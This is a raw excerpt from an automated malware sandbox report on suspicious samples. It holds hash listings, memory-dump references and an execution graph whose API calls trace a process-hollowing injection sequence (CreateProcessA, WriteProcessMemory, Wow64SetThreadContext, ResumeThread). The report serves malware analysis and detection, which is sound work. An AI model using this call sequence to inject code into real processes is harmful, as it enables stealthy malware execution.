                              • Opcode ID: 63b405ddb436fd84a394e1e3992738dc4596c9d54c799fc43a737e3a96f45312
                              • Instruction ID: d836b9b9669cf22ff5c6ca26677979e8619c20031e3cda19cc00295c130036d5
                              • Opcode Fuzzy Hash: 63b405ddb436fd84a394e1e3992738dc4596c9d54c799fc43a737e3a96f45312
                              • Instruction Fuzzy Hash: DF210771604308EFDB16DF90D9C4B66BB66FB84314F20C66DEA494F296C336D846CAA1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1290800753.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_afd000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7ace1e83d5569f2751291730a1694cebd92936df93ca32e4fa961cddec862114
                              • Instruction ID: 1d8d221de877cddf62edd429c270a08d2364d47bc628ff9fec158a29c886b1c3
                              • Opcode Fuzzy Hash: 7ace1e83d5569f2751291730a1694cebd92936df93ca32e4fa961cddec862114
                              • Instruction Fuzzy Hash: 792180755093848FCB07CF24D990715BF72EB46314F28C5EAD9498B6A7C33A980ACB62
                              Memory Dump Source
                              • Source File: 00000000.00000002.1290310794.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9ed000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                              • Instruction ID: d5ecf86e06f42882f90a8fc2da1c34d10ccf49fe296376cdd62652b1b335b293
                              • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                              • Instruction Fuzzy Hash: 6F112676504280DFCB06CF00D5C0B16BF72FBA4324F24C2A9D8090B2A6C33AE856CBA1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1290310794.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9ed000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                              • Instruction ID: 86eeba9c9141aa01cb3abd1806a0ab3c57f3fc67862eb744480dadc04806a654
                              • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                              • Instruction Fuzzy Hash: 4D11E676504280DFCB16CF14D9C4B16BF72FB94324F24C6ADE8490B65AC336D856CBA1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1290800753.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_afd000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                              • Instruction ID: 015d8247f8282a1a93ff70f20ab1091aa90e60086e229032a31c6be38af107fb
                              • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                              • Instruction Fuzzy Hash: 2611DD75504284DFCB06CF50C5C0B65FBB2FB84324F24C6AEE9494B296C33AD80ACBA1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1290310794.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9ed000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 844dcc659a4072d0c8e290e1e11de4335bd8f59c2e37621b4042de5c2f0fea97
                              • Instruction ID: 392972ced6151ba391c5ede770a994d190b9b34c0729bf40e9894eaabbfc5926
                              • Opcode Fuzzy Hash: 844dcc659a4072d0c8e290e1e11de4335bd8f59c2e37621b4042de5c2f0fea97
                              • Instruction Fuzzy Hash: A301F7B14093849BE7214B22CCC4766BB9CDF41325F14C819EC084F282C27A9C40CAB2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1290310794.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9ed000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fa41ff07433e7167ea3076dcba0c838a0404cb08658f1c1348b4a9708f4ffc12
                              • Instruction ID: c83ebb325993f4085564231fe40c20a47cbdfe3655f88246f1a02987cd4600d8
                              • Opcode Fuzzy Hash: fa41ff07433e7167ea3076dcba0c838a0404cb08658f1c1348b4a9708f4ffc12
                              • Instruction Fuzzy Hash: 48F06271405384AEE7118B16CD84B66FF9CEB91735F18C55AED084F286C2799C44CA71
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1295727036.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_5950000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID: 4'q$TJq$Teq$pq$xbq
                              • API String ID: 0-4142780942
                              • Opcode ID: b61c9d9b523e482d3e4416ee019a0248c63acd9c149d12a9e07182444583a2eb
                              • Instruction ID: e3e95625589711951044e835381b62242153fd328a5c4464382ef560ae1cec93
                              • Opcode Fuzzy Hash: b61c9d9b523e482d3e4416ee019a0248c63acd9c149d12a9e07182444583a2eb
                              • Instruction Fuzzy Hash: 77B2D274E00228CFDB65CF69C984AD9BBB2FF89304F1581E9D509AB265DB319E91CF40
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1295727036.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_5950000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID: 4'q
                              • API String ID: 0-1807707664
                              • Opcode ID: 47a2b04171b9303f927a6ee3e1d236fefd6a586ca1604c03645b8d3f102f3d86
                              • Instruction ID: ce1d35f31429321feb31f3cec5c5f3a366d51e69447aaae3dccbffaebb0dd295
                              • Opcode Fuzzy Hash: 47a2b04171b9303f927a6ee3e1d236fefd6a586ca1604c03645b8d3f102f3d86
                              • Instruction Fuzzy Hash: 5471FA70E002488FEB09EF6BE845A9A7BF2FBC9301F14D529D0059B26DEB74594ADB41
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1295727036.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_5950000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID: 4'q
                              • API String ID: 0-1807707664
                              • Opcode ID: d365a0024fba7a677b892dcd84acec45458d37ff98945459ff6c895f4aac0233
                              • Instruction ID: 3d8ae24e1728943d28f4643a04b67abf6c24b850a67ce9107da0da6c907401c5
                              • Opcode Fuzzy Hash: d365a0024fba7a677b892dcd84acec45458d37ff98945459ff6c895f4aac0233
                              • Instruction Fuzzy Hash: BB61D970E002488FEB09EF6BE845A9ABBF3FBC9301F14D529D0059B26DDB74594ADB41
                              Memory Dump Source
                              • Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c6e733b0717086459c3803f457fa06115f7c51a2d7b58d1e4e4471dd351a3738
                              • Instruction ID: 2fe19bf43b4157d62166ec45c1563d497f16f50055fe049da51ea427c91f1db0
                              • Opcode Fuzzy Hash: c6e733b0717086459c3803f457fa06115f7c51a2d7b58d1e4e4471dd351a3738
                              • Instruction Fuzzy Hash: 28E1D574E002198FDB64DFA9C580AAEBBF2FF89304F648169D414AB759D730AD41CFA1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 39e1345f3b681dea036c49d8a853a1c9d3c29ad38256d01d5831153a42423895
                              • Instruction ID: 2f84b5bc7f949103f59e7b4a5d37c09f6a82a2e85859b0661a9eb987f1eb0529
                              • Opcode Fuzzy Hash: 39e1345f3b681dea036c49d8a853a1c9d3c29ad38256d01d5831153a42423895
                              • Instruction Fuzzy Hash: 51E1D574E002198FDB64DFA9C580AAEBBF2FF89305F248169D414AB359D731AD41CFA1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 58e37e6988dfd53886fa0e296a71224ab9543288eecbab0d2abece8f97bc21c7
                              • Instruction ID: fc8235c94643bb6eb56ea9a5409667d2e42be84b28c1e9be06de56fe2813926a
                              • Opcode Fuzzy Hash: 58e37e6988dfd53886fa0e296a71224ab9543288eecbab0d2abece8f97bc21c7
                              • Instruction Fuzzy Hash: 9AE1C374E002198FDB64DFA9C580AAEBBF2FF89305F248169D415AB359D730AD41CFA1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f34f93ab38a7e1bb6274477b5d8d14b1e767e7392f4c0b379a99a51af76d144c
                              • Instruction ID: 26d9ff45fee9ec1dcf950541ce4ad532fb23626d9a39c3f138456dca7cfe08cc
                              • Opcode Fuzzy Hash: f34f93ab38a7e1bb6274477b5d8d14b1e767e7392f4c0b379a99a51af76d144c
                              • Instruction Fuzzy Hash: EEE1E674E002198FDB14DFA9C580AAEBBF2FF89304F248169D814AB359D735AD41CFA1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0faa3dc076c80f81bc8dd8064f1256b16fd1b97594a56429614f393f0eaea82a
                              • Instruction ID: 4d1680155d91230bfe55c26001699d29ad35bdea096c6e5d1bd11093e135461e
                              • Opcode Fuzzy Hash: 0faa3dc076c80f81bc8dd8064f1256b16fd1b97594a56429614f393f0eaea82a
                              • Instruction Fuzzy Hash: CEE1D774E012198FDB64DFA9C580AAEBBF2FF89304F648169D414AB759D730AD41CFA0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1290981809.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_b40000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 573d1d4d2dde0b41e652c00f77b9d79a9f77d17eaf0a9bd8038cde8aa0d0210d
                              • Instruction ID: 3433e063c08d25abbe71d0fa381aadd38259ca981d5f1727cc43ece8b155207d
                              • Opcode Fuzzy Hash: 573d1d4d2dde0b41e652c00f77b9d79a9f77d17eaf0a9bd8038cde8aa0d0210d
                              • Instruction Fuzzy Hash: 70A14C36E0021A8FCF09DFA4C8445AEB7F2FF85300B1545BAE915AB265DB71EA15DB40
                              Memory Dump Source
                              • Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f10cf0c85fbd5fb7a2acea1103b3dc71319f108ae567267acb361ca35234417b
                              • Instruction ID: 150d2fd752a272f168115fff47e3e7a83f81b1581085f805f32a38455186b3bf
                              • Opcode Fuzzy Hash: f10cf0c85fbd5fb7a2acea1103b3dc71319f108ae567267acb361ca35234417b
                              • Instruction Fuzzy Hash: 5951D974E002198FDB58DFA9C5805AEFBF2FF89305F248169D418AB355D7319941CFA1

                              Execution Graph

                              Execution Coverage:12%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:230
                              Total number of Limit Nodes:16
                              execution_graph 34270 2e3d560 34271 2e3d5a6 34270->34271 34274 2e3d740 34271->34274 34277 2e3d308 34274->34277 34278 2e3d7a8 DuplicateHandle 34277->34278 34279 2e3d693 34278->34279 34386 2e3b1d0 34389 2e3b2cd 34386->34389 34387 2e3b1df 34390 2e3b2fc 34389->34390 34391 2e3b2d9 34389->34391 34390->34387 34391->34390 34392 2e3b500 GetModuleHandleW 34391->34392 34393 2e3b52d 34392->34393 34393->34387 34280 75f6818 34281 75f6866 DrawTextExW 34280->34281 34283 75f68be 34281->34283 34356 75f6c48 34357 75f6c82 34356->34357 34358 75f6cfe 34357->34358 34359 75f6d13 34357->34359 34364 75f41c4 34358->34364 34361 75f41c4 3 API calls 34359->34361 34363 75f6d22 34361->34363 34366 75f41cf 34364->34366 34365 75f6d09 34366->34365 34369 75f7657 34366->34369 34376 75f7668 34366->34376 34370 75f7668 34369->34370 34371 75f7682 34370->34371 34383 75f420c 34370->34383 34373 75f768e 34371->34373 34374 75f76b8 CreateIconFromResourceEx 34371->34374 34373->34365 34375 75f7736 34374->34375 34375->34365 34377 75f766d 34376->34377 34378 75f7682 34377->34378 34379 75f420c CreateIconFromResourceEx 34377->34379 34380 75f768e 34378->34380 34381 75f76b8 CreateIconFromResourceEx 34378->34381 34379->34378 34380->34365 34382 75f7736 34381->34382 34382->34365 34384 75f76b8 CreateIconFromResourceEx 34383->34384 34385 75f7736 34384->34385 34385->34371 34394 797a0ed 34395 797a107 34394->34395 34399 797bd30 34394->34399 34416 797bd78 34394->34416 34434 797bd20 34394->34434 34400 797bd4a 34399->34400 34401 797bd6e 34400->34401 34451 797c8f7 34400->34451 34456 797c189 34400->34456 34461 797cbaa 34400->34461 34467 797c36a 34400->34467 34472 797c42c 34400->34472 34476 797ca6d 34400->34476 34481 797c5a2 34400->34481 34485 797c5c3 34400->34485 34490 797c1ba 34400->34490 34494 797c97b 34400->34494 34499 797c75c 34400->34499 34504 797c6fe 34400->34504 34511 797c3d6 34400->34511 34515 797c596 34400->34515 34401->34395 34417 797bd13 34416->34417 34418 797bd1b 34416->34418 34417->34395 34419 797c8f7 2 API calls 34418->34419 34420 797c596 2 API calls 34418->34420 34421 797c3d6 2 API calls 34418->34421 34422 797c6fe 4 API calls 34418->34422 34423 797c75c 2 API calls 34418->34423 34424 797c97b 2 API calls 34418->34424 34425 797bcc3 34418->34425 34426 797c1ba 2 API calls 34418->34426 34427 797c5c3 2 API calls 34418->34427 34428 797c5a2 2 API calls 34418->34428 34429 797ca6d 2 API calls 34418->34429 34430 797c42c 2 API calls 34418->34430 34431 797c36a 2 API calls 34418->34431 34432 797cbaa 2 API calls 34418->34432 34433 797c189 2 API calls 34418->34433 34419->34425 34420->34425 34421->34425 34422->34425 34423->34425 34424->34425 34425->34395 34426->34425 34427->34425 34428->34425 34429->34425 34430->34425 34431->34425 34432->34425 34433->34425 34435 797bd4a 34434->34435 34436 797bd6e 34435->34436 34437 797c8f7 2 API calls 34435->34437 34438 797c596 2 API calls 34435->34438 34439 797c3d6 2 API calls 34435->34439 34440 797c6fe 4 API calls 34435->34440 34441 797c75c 2 API calls 34435->34441 34442 797c97b 2 API calls 34435->34442 34443 797c1ba 2 API calls 34435->34443 34444 797c5c3 2 API calls 34435->34444 34445 797c5a2 2 API calls 34435->34445 34446 797ca6d 2 API calls 34435->34446 34447 797c42c 2 API calls 34435->34447 34448 797c36a 2 API calls 34435->34448 34449 797cbaa 2 API calls 34435->34449 34450 797c189 2 API calls 34435->34450 34436->34395 34437->34436 34438->34436 34439->34436 34440->34436 34441->34436 34442->34436 34443->34436 34444->34436 34445->34436 34446->34436 34447->34436 34448->34436 34449->34436 34450->34436 34520 79793e1 34451->34520 34524 79793e8 34451->34524 34452 797c8d0 34452->34451 34453 797cbca 34452->34453 34457 797c18c 34456->34457 34528 7979c40 34457->34528 34532 7979c3d 34457->34532 34462 797cbb7 34461->34462 34463 797c2dc 34461->34463 34464 797cbd2 34463->34464 34536 7979330 34463->34536 34540 7979338 34463->34540 34464->34401 34468 797c982 34467->34468 34544 7979aa0 34468->34544 34548 7979aa8 34468->34548 34469 797c218 34469->34401 34469->34469 34552 79799b1 34472->34552 34556 79799b8 34472->34556 34473 797c45a 34473->34401 34477 797c2dc 34476->34477 34478 797cbd2 34477->34478 34479 7979330 ResumeThread 34477->34479 34480 7979338 ResumeThread 34477->34480 34478->34401 34479->34477 34480->34477 34482 797c5b2 34481->34482 34483 79799b1 WriteProcessMemory 34482->34483 34484 79799b8 WriteProcessMemory 34482->34484 34483->34482 34484->34482 34486 797c2dc 34485->34486 34487 797cbd2 34486->34487 34488 7979330 ResumeThread 34486->34488 34489 7979338 ResumeThread 34486->34489 34487->34401 34488->34486 34489->34486 34491 797c1f0 34490->34491 34492 7979c40 CreateProcessA 34490->34492 34493 7979c3d CreateProcessA 34490->34493 34492->34491 34493->34491 34495 797c981 34494->34495 34496 797c218 34495->34496 34497 7979aa0 ReadProcessMemory 34495->34497 34498 7979aa8 ReadProcessMemory 34495->34498 34496->34401 34497->34496 34498->34496 34500 797c769 34499->34500 34501 797c218 34499->34501 34502 79799b1 WriteProcessMemory 34500->34502 34503 79799b8 WriteProcessMemory 34500->34503 34502->34501 34503->34501 34509 79793e1 Wow64SetThreadContext 34504->34509 34510 79793e8 Wow64SetThreadContext 34504->34510 34505 797c2dc 34506 797cba4 34505->34506 34507 7979330 ResumeThread 34505->34507 34508 7979338 ResumeThread 34505->34508 34506->34401 34507->34505 34508->34505 34509->34505 34510->34505 34512 797c5b4 34511->34512 34513 79799b1 WriteProcessMemory 34512->34513 34514 79799b8 WriteProcessMemory 34512->34514 34513->34512 34514->34512 34516 797cb64 34515->34516 34560 79798f0 34516->34560 34564 79798f8 34516->34564 34517 797cb82 34521 79793e8 Wow64SetThreadContext 34520->34521 34523 7979475 34521->34523 34523->34452 34525 797942d Wow64SetThreadContext 34524->34525 34527 7979475 34525->34527 34527->34452 34529 7979cc9 CreateProcessA 34528->34529 34531 7979e8b 34529->34531 34533 7979c40 CreateProcessA 34532->34533 34535 7979e8b 34533->34535 34537 7979338 ResumeThread 34536->34537 34539 79793a9 34537->34539 34539->34463 34541 7979378 ResumeThread 34540->34541 34543 79793a9 34541->34543 34543->34463 34545 7979aa8 ReadProcessMemory 34544->34545 34547 7979b37 34545->34547 34547->34469 34549 7979af3 ReadProcessMemory 34548->34549 34551 7979b37 34549->34551 34551->34469 34553 79799b8 WriteProcessMemory 34552->34553 34555 7979a57 34553->34555 34555->34473 34557 7979a00 WriteProcessMemory 34556->34557 34559 7979a57 34557->34559 34559->34473 34561 7979938 VirtualAllocEx 34560->34561 34563 7979975 34561->34563 34563->34517 34565 7979938 VirtualAllocEx 34564->34565 34567 7979975 34565->34567 34567->34517 34284 2e34668 34285 2e34684 34284->34285 34286 2e346a4 34285->34286 34288 2e34838 34285->34288 34289 2e3485d 34288->34289 34293 2e34937 34289->34293 34297 2e34948 34289->34297 34295 2e3496f 34293->34295 34294 2e34a4c 34294->34294 34295->34294 34301 2e34544 34295->34301 34299 2e3496f 34297->34299 34298 2e34a4c 34298->34298 34299->34298 34300 2e34544 CreateActCtxA 34299->34300 34300->34298 34302 2e35dd8 CreateActCtxA 34301->34302 34304 2e35e9b 34302->34304 34305 75fc490 34306 75fc4b7 34305->34306 34310 75fded2 34306->34310 34317 75fddc0 34306->34317 34307 75fc555 34311 75fdee9 34310->34311 34325 75fe395 34311->34325 34329 75fe320 34311->34329 34333 75fe330 34311->34333 34337 75fe3d4 34311->34337 34312 75fdf0e 34312->34307 34318 75fddc3 34317->34318 34319 75fde2a 34318->34319 34321 75fe395 PostMessageW 34318->34321 34322 75fe3d4 PostMessageW 34318->34322 34323 75fe330 PostMessageW 34318->34323 34324 75fe320 PostMessageW 34318->34324 34319->34307 34320 75fdf0e 34320->34307 34321->34320 34322->34320 34323->34320 34324->34320 34326 75fe3a4 34325->34326 34344 75fddd0 34326->34344 34328 75fe3cd 34331 75fe323 34329->34331 34330 75fddd0 PostMessageW 34330->34331 34331->34330 34332 75fe38f 34331->34332 34332->34312 34335 75fe357 34333->34335 34334 75fddd0 PostMessageW 34334->34335 34335->34334 34336 75fe38f 34335->34336 34336->34312 34338 75fddd0 PostMessageW 34337->34338 34339 75fe3df 34338->34339 34341 75fddd0 PostMessageW 34339->34341 34343 75fe37a 34339->34343 34340 75fddd0 PostMessageW 34340->34343 34341->34343 34342 75fe38f 34342->34312 34343->34340 34343->34342 34345 75fdde0 34344->34345 34346 75fddf0 34345->34346 34348 797cfa0 34345->34348 34346->34328 34349 797cf43 34348->34349 34351 797cfab 34348->34351 34349->34346 34350 797d13b 34350->34346 34351->34350 34353 7976550 34351->34353 34354 797d230 PostMessageW 34353->34354 34355 797d29c 34354->34355 34355->34351

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 547 7979c3d-7979cd5 550 7979cd7-7979ce1 547->550 551 7979d0e-7979d2e 547->551 550->551 552 7979ce3-7979ce5 550->552 558 7979d67-7979d96 551->558 559 7979d30-7979d3a 551->559 553 7979ce7-7979cf1 552->553 554 7979d08-7979d0b 552->554 556 7979cf5-7979d04 553->556 557 7979cf3 553->557 554->551 556->556 560 7979d06 556->560 557->556 565 7979dcf-7979e89 CreateProcessA 558->565 566 7979d98-7979da2 558->566 559->558 561 7979d3c-7979d3e 559->561 560->554 563 7979d61-7979d64 561->563 564 7979d40-7979d4a 561->564 563->558 567 7979d4e-7979d5d 564->567 568 7979d4c 564->568 579 7979e92-7979f18 565->579 580 7979e8b-7979e91 565->580 566->565 570 7979da4-7979da6 566->570 567->567 569 7979d5f 567->569 568->567 569->563 571 7979dc9-7979dcc 570->571 572 7979da8-7979db2 570->572 571->565 574 7979db6-7979dc5 572->574 575 7979db4 572->575 574->574 577 7979dc7 574->577 575->574 577->571 590 7979f1a-7979f1e 579->590 591 7979f28-7979f2c 579->591 580->579 590->591 592 7979f20 590->592 593 7979f2e-7979f32 591->593 594 7979f3c-7979f40 591->594 592->591 593->594 595 7979f34 593->595 596 7979f42-7979f46 594->596 597 7979f50-7979f54 594->597 595->594 596->597 598 7979f48 596->598 599 7979f66-7979f6d 597->599 600 7979f56-7979f5c 597->600 598->597 601 7979f84 599->601 602 7979f6f-7979f7e 599->602 600->599 604 7979f85 601->604 602->601 604->604
                              APIs
                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07979E76
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: 3cea4ec7e242f5b96f022c594168fc7494fe4594b9db23834b40386d40785cd5
                              • Instruction ID: 00b9ab7eff67d9a243b731615766ec7fea9dcb2c48732feeccde796bd7235169
                              • Opcode Fuzzy Hash: 3cea4ec7e242f5b96f022c594168fc7494fe4594b9db23834b40386d40785cd5
                              • Instruction Fuzzy Hash: F4914BB1D0071ACFDF24DF68C885BEDBBB6EB48324F048569E809A7240DB749985CF91

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 605 7979c40-7979cd5 607 7979cd7-7979ce1 605->607 608 7979d0e-7979d2e 605->608 607->608 609 7979ce3-7979ce5 607->609 615 7979d67-7979d96 608->615 616 7979d30-7979d3a 608->616 610 7979ce7-7979cf1 609->610 611 7979d08-7979d0b 609->611 613 7979cf5-7979d04 610->613 614 7979cf3 610->614 611->608 613->613 617 7979d06 613->617 614->613 622 7979dcf-7979e89 CreateProcessA 615->622 623 7979d98-7979da2 615->623 616->615 618 7979d3c-7979d3e 616->618 617->611 620 7979d61-7979d64 618->620 621 7979d40-7979d4a 618->621 620->615 624 7979d4e-7979d5d 621->624 625 7979d4c 621->625 636 7979e92-7979f18 622->636 637 7979e8b-7979e91 622->637 623->622 627 7979da4-7979da6 623->627 624->624 626 7979d5f 624->626 625->624 626->620 628 7979dc9-7979dcc 627->628 629 7979da8-7979db2 627->629 628->622 631 7979db6-7979dc5 629->631 632 7979db4 629->632 631->631 634 7979dc7 631->634 632->631 634->628 647 7979f1a-7979f1e 636->647 648 7979f28-7979f2c 636->648 637->636 647->648 649 7979f20 647->649 650 7979f2e-7979f32 648->650 651 7979f3c-7979f40 648->651 649->648 650->651 652 7979f34 650->652 653 7979f42-7979f46 651->653 654 7979f50-7979f54 651->654 652->651 653->654 655 7979f48 653->655 656 7979f66-7979f6d 654->656 657 7979f56-7979f5c 654->657 655->654 658 7979f84 656->658 659 7979f6f-7979f7e 656->659 657->656 661 7979f85 658->661 659->658 661->661
                              APIs
                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07979E76
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: 0a4a9189c2b5ba400cf4101b4912cbffb912d024550daed2da312305e3a09964
                              • Instruction ID: d5bf8cc077551da77298aaf06ecd043029c62cabdff5a6199e89a5d39221b751
                              • Opcode Fuzzy Hash: 0a4a9189c2b5ba400cf4101b4912cbffb912d024550daed2da312305e3a09964
                              • Instruction Fuzzy Hash: 2D914BB1D0071ACFDF24DF68C8857DDBBB6EB48324F048569E809A7240DB749985CF91

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 662 2e3b2cd-2e3b2d7 663 2e3b303-2e3b307 662->663 664 2e3b2d9-2e3b2e6 call 2e39d40 662->664 665 2e3b31b-2e3b35c 663->665 666 2e3b309-2e3b313 663->666 671 2e3b2e8 664->671 672 2e3b2fc 664->672 673 2e3b369-2e3b377 665->673 674 2e3b35e-2e3b366 665->674 666->665 718 2e3b2ee call 2e3b560 671->718 719 2e3b2ee call 2e3b550 671->719 672->663 676 2e3b39b-2e3b39d 673->676 677 2e3b379-2e3b37e 673->677 674->673 675 2e3b2f4-2e3b2f6 675->672 678 2e3b438-2e3b4f8 675->678 679 2e3b3a0-2e3b3a7 676->679 680 2e3b380-2e3b387 call 2e3af58 677->680 681 2e3b389 677->681 712 2e3b500-2e3b52b GetModuleHandleW 678->712 713 2e3b4fa-2e3b4fd 678->713 683 2e3b3b4-2e3b3bb 679->683 684 2e3b3a9-2e3b3b1 679->684 682 2e3b38b-2e3b399 680->682 681->682 682->679 687 2e3b3c8-2e3b3d1 call 2e3af68 683->687 688 2e3b3bd-2e3b3c5 683->688 684->683 693 2e3b3d3-2e3b3db 687->693 694 2e3b3de-2e3b3e3 687->694 688->687 693->694 695 2e3b401-2e3b408 call 2e3b860 694->695 696 2e3b3e5-2e3b3ec 694->696 700 2e3b40b-2e3b40e 695->700 696->695 698 2e3b3ee-2e3b3fe call 2e3af78 call 2e3af88 696->698 698->695 703 2e3b431-2e3b437 700->703 704 2e3b410-2e3b42e 700->704 704->703 714 2e3b534-2e3b548 712->714 715 2e3b52d-2e3b533 712->715 713->712 715->714 718->675 719->675
                              APIs
                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02E3B51E
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1346314320.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_2e30000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: b05eeba5ef75b34524356e41f76029a79e5b8f2139701b955a64b0cc9f5a7c04
                              • Instruction ID: 97dd63024a7e1a33dcb4f4d9c5513bbe75df956e7f51bc06bc77f34dabb9731f
                              • Opcode Fuzzy Hash: b05eeba5ef75b34524356e41f76029a79e5b8f2139701b955a64b0cc9f5a7c04
                              • Instruction Fuzzy Hash: A2713770A00B058FD725DF29D45579ABBF2FF88309F008A2DD08AD7A50E775E946CB91

                              Control-flow Graph

                              • Executed
                              • Not Executed
